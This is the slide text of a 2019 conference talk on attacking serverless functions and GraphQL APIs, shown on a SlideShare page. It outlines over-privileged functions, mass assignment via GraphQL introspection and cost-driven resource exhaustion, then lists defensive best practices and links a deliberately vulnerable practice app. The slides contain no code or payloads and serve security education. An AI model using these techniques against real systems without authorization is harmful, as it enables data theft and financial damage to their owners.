Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

DevSecCon Singapore 2019: An attacker's view of Serverless and GraphQL apps Sharath Kumar Ramadas

160 views

Published on

Sharath Kumar Ramadas

Serverless Technology (Functions as a Service) is fast becoming the next "big thing" in the world of distributed applications. Organizations are investing a great deal of resources in this technology as a force-multiplier, cost-saver and ops-simplification cure-all. Especially with widespread support from cloud vendors, this technology is going to only become more influential. However, like everything else, Serverless apps are subject to a wide variety of attack possibilities, ranging from attacks against access control tech like JWTs, to NoSQL Injection, to exploits against the apps themselves (deserialization, etc) escalating privileges to other cloud components.

On the other hand GraphQL (API Query Language) is the natural companion to serverless apps, where traditional REST APIs are replaced with GraphQL to provide greater flexibility, greater query parameterization and speed. GraphQL is slowly negating the need for REST APIs from being developed. Combined with Serverless tech/Reactive Front-end frameworks, GraphQL is very powerful for distributed apps. However, GraphQL can be abused with a variety of attacks including but not limited to Injection Attacks, Nested Resource Exhaustion attacks, Authorization Flaws among others.

This talk presents a red-team perspective of the various ways in which testers can discover and exploit serverless and/or GraphQL driven applications to compromise sensitive information, and gain a deeper foothold into database services, IAM services and other other cloud components. The talk will have some demos that will demonstrate practical attacks and attack possibilities against Serverless and GraphQL applications. The author will release an intentionally vulnerable Serverless and GraphQL app at the end of the talk for the benefit of the audience and the security community at large.

Published in: Technology
  • Be the first to comment

DevSecCon Singapore 2019: An attacker's view of Serverless and GraphQL apps Sharath Kumar Ramadas

  1. 1. Singapore | 28 Feb - 01 Mar 2019 An Attacker's View of Serverless and GraphQL Apps Sharath Kumar Ramadas
  2. 2. Singapore | 28 Feb - 01 Mar 2019 About Me • Lead Solutions Engineer • we45 - An AppSec Company • Trainer - DevSecOps, Containers & Serverless • Developer - DVFAAS, Orchestron & ThreatPlayBook • Developer → DevOps → DevSecOps @sharathkramadas @sharathkramadas
  3. 3. Singapore | 28 Feb - 01 Mar 2019 Agenda • Intro to Serverless • Serverless Attacks • Intro to GraphQL • GraphQL Attacks • Demos
  4. 4. Singapore | 28 Feb - 01 Mar 2019 SERVERLESS
  5. 5. Singapore | 28 Feb - 01 Mar 2019 Serverless • Functions deployed as ephemeral containers/vms • Functions As A Service (FAAS) • Event trigger architecture • Supports major runtimes • Python, NodeJS, C#, GO, Ruby • Custom runtime also
  6. 6. Singapore | 28 Feb - 01 Mar 2019 Serverless Journey
  7. 7. Singapore | 28 Feb - 01 Mar 2019 Functions
  8. 8. Singapore | 28 Feb - 01 Mar 2019 Why Serverless? • Pay per usage • No server management • Microservices Friendly • Auto-Scalable • Focus on code/features, don’t worry about servers
  9. 9. Singapore | 28 Feb - 01 Mar 2019 FAAS Providers
  10. 10. Singapore | 28 Feb - 01 Mar 2019 Architecture
  11. 11. Singapore | 28 Feb - 01 Mar 2019 Serverless Use-Cases • ChatBots • Event driven apps • Notification Channels (SMS, Email) • Scheduled Jobs • Product websites • Lot more …..
  12. 12. Singapore | 28 Feb - 01 Mar 2019 Let’s Deploy!
  13. 13. Singapore | 28 Feb - 01 Mar 2019 Functions with Events
  14. 14. Singapore | 28 Feb - 01 Mar 2019 An Attacker’s View • Functions are still code • No frameworks involved • Functions as events increases attack surface • Developers are new to servers • Still needs configuration
  15. 15. Singapore | 28 Feb - 01 Mar 2019 Attackers are Snipers! • Aimed • Committed • Patient • Invisible • Takes clear Shot
  16. 16. Singapore | 28 Feb - 01 Mar 2019 Claim your expenses
  17. 17. Singapore | 28 Feb - 01 Mar 2019 Extensive Privileged Functions • Functions with extensive privileges lead to infrastructure compromise • Cloud providers store secrets in plain text • Misconfigured roles can lead to wide spectrum of attacks • Events are most vulnerable due to lack of Authentication and Authorization • Pay per usage model turns out to be expensive.
  18. 18. Singapore | 28 Feb - 01 Mar 2019 Accenture S3 Breach
  19. 19. Singapore | 28 Feb - 01 Mar 2019 Fedex Breach
  20. 20. Singapore | 28 Feb - 01 Mar 2019 Serverless Top 10 • Event data injection • Broken Authentication • Insecure deployment configuration • Over privileged function permissions & roles • Inadequate function monitoring and logging • Insecure 3rd party dependencies • Insecure application secrets storage • DOS and Financial resource exhaustion • Function Execution Flow Manipulation • Improper Exception Handling and Verbose Error Messages
  21. 21. Singapore | 28 Feb - 01 Mar 2019 Serverless (Security) Best Practices • Functions with minimal access credentials • Remove insecure dependencies before production • Run SAST scans before code commit • Restrict memory usage for a function • Encrypt the secrets avoid environment variables • Use FAAS providers authorization for access control (ex: AWS Cognito) • Write security test cases and run in CI/CD @sharathkramadas
  22. 22. Singapore | 28 Feb - 01 Mar 2019 GraphQL
  23. 23. Singapore | 28 Feb - 01 Mar 2019 GraphQL • A query language for API • Tech from Facebook • Query what you want forget about the ‘REST’ • Single endpoint for API calls • Lightweight
  24. 24. Singapore | 28 Feb - 01 Mar 2019 REST GraphQL VS
  25. 25. Singapore | 28 Feb - 01 Mar 2019 Terminology • Type • Schema • Query • Mutation • Subscription • Introspection • Schema Stitching
  26. 26. Singapore | 28 Feb - 01 Mar 2019 Let’s Demo
  27. 27. Singapore | 28 Feb - 01 Mar 2019 An Attacker’s View • No response size limiting • Introspection is nice! • Single endpoint access control
  28. 28. Singapore | 28 Feb - 01 Mar 2019 Demo Want to get more powers!
  29. 29. Singapore | 28 Feb - 01 Mar 2019 Mass Assignment • Frameworks allow to save the raw dump of HTTP request data • Attackers can guess the sensitive fields • Sensitive fields can allow to escalate privileges • GraphQL has introspection enabled by default • Introspection leaks the sensitive fields information • GraphQL supports JSON Scalar
  30. 30. Singapore | 28 Feb - 01 Mar 2019 GitHub Attack
  31. 31. Singapore | 28 Feb - 01 Mar 2019 Let’s burn few dollars
  32. 32. Singapore | 28 Feb - 01 Mar 2019 Serverless Cost
  33. 33. Singapore | 28 Feb - 01 Mar 2019 Resource Exhaustion • aka Denial-Of-Service attack • Overwhelmed requests to crash the server • Causes memory leak and resource exhaust • Serverless + GraphQL = (pay per usage + scale) • 2 million requests * 3 dollar per query = (I will live it to your imagination!)
  34. 34. Singapore | 28 Feb - 01 Mar 2019 Recent Attack
  35. 35. Singapore | 28 Feb - 01 Mar 2019 GraphQL (Security) Best Practices • Disable introspection • Disable playground in production • Limit the query size • Depth limiting for nested queries • Avoid scalars use input types
  36. 36. Singapore | 28 Feb - 01 Mar 2019 Hack It Yourself! https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service
  37. 37. Singapore | 28 Feb - 01 Mar 2019 Things to consider • OWASP Top 10 • Serverless Top 10 • SAST and SCA tools • Threat-Modeling
  38. 38. Singapore | 28 Feb - 01 Mar 2019 Key Takeaways • Serverless security is still an application security problem • Roles and Permissions should be well thought of • Secure coding practices need to be followed • Resource limitations is highly recommended
  39. 39. Singapore | 28 Feb - 01 Mar 2019 Thank You @sharathkramadas @sharathkramadas

×